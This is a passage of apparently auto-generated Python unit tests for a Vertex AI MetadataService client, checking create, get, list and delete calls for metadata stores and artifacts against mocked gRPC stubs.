call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_metadata_store(
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_store
mock_val = gca_metadata_store.MetadataStore(name="name_value")
assert arg == mock_val
arg = args[0].metadata_store_id
mock_val = "metadata_store_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_metadata_store(
metadata_service.CreateMetadataStoreRequest(),
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetMetadataStoreRequest,
dict,
],
)
def test_get_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_store.MetadataStore(
name="name_value",
description="description_value",
)
response = client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_store.MetadataStore)
assert response.name == "name_value"
assert response.description == "description_value"
def test_get_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
client.get_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
@pytest.mark.asyncio
async def test_get_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.GetMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore(
name="name_value",
description="description_value",
)
)
response = await client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_store.MetadataStore)
assert response.name == "name_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_metadata_store_async_from_dict():
await test_get_metadata_store_async(request_type=dict)
def test_get_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
call.return_value = metadata_store.MetadataStore()
client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore()
)
await client.get_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_store.MetadataStore()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_metadata_store(
metadata_service.GetMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_store.MetadataStore()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_store.MetadataStore()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_metadata_store(
metadata_service.GetMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListMetadataStoresRequest,
dict,
],
)
def test_list_metadata_stores(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataStoresResponse(
next_page_token="next_page_token_value",
)
response = client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataStoresPager)
assert response.next_page_token == "next_page_token_value"
def test_list_metadata_stores_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
client.list_metadata_stores()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
@pytest.mark.asyncio
async def test_list_metadata_stores_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.ListMetadataStoresRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataStoresRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataStoresAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_metadata_stores_async_from_dict():
await test_list_metadata_stores_async(request_type=dict)
def test_list_metadata_stores_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataStoresRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
call.return_value = metadata_service.ListMetadataStoresResponse()
client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_metadata_stores_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataStoresRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse()
)
await client.list_metadata_stores(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_metadata_stores_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataStoresResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_metadata_stores(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_metadata_stores_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_metadata_stores(
metadata_service.ListMetadataStoresRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_metadata_stores_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataStoresResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataStoresResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_metadata_stores(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_metadata_stores_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_metadata_stores(
metadata_service.ListMetadataStoresRequest(),
parent="parent_value",
)
def test_list_metadata_stores_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_metadata_stores(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, metadata_store.MetadataStore) for i in results)
def test_list_metadata_stores_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
pages = list(client.list_metadata_stores(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_metadata_stores_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
async_pager = await client.list_metadata_stores(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, metadata_store.MetadataStore) for i in responses)
@pytest.mark.asyncio
async def test_list_metadata_stores_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_stores),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
next_page_token="abc",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[],
next_page_token="def",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataStoresResponse(
metadata_stores=[
metadata_store.MetadataStore(),
metadata_store.MetadataStore(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_metadata_stores(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteMetadataStoreRequest,
dict,
],
)
def test_delete_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
client.delete_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
@pytest.mark.asyncio
async def test_delete_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.DeleteMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_metadata_store_async_from_dict():
await test_delete_metadata_store_async(request_type=dict)
def test_delete_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteMetadataStoreRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_metadata_store(
metadata_service.DeleteMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_metadata_store(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_metadata_store_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_metadata_store(
metadata_service.DeleteMetadataStoreRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateArtifactRequest,
dict,
],
)
def test_create_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
client.create_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
@pytest.mark.asyncio
async def test_create_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.CreateArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_artifact_async_from_dict():
await test_create_artifact_async(request_type=dict)
def test_create_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateArtifactRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
call.return_value = gca_artifact.Artifact()
client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateArtifactRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
await client.create_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_artifact(
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].artifact_id
mock_val = "artifact_id_value"
assert arg == mock_val
def test_create_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_artifact(
metadata_service.CreateArtifactRequest(),
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
@pytest.mark.asyncio
async def test_create_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_artifact(
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].artifact_id
mock_val = "artifact_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_artifact(
metadata_service.CreateArtifactRequest(),
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetArtifactRequest,
dict,
],
)
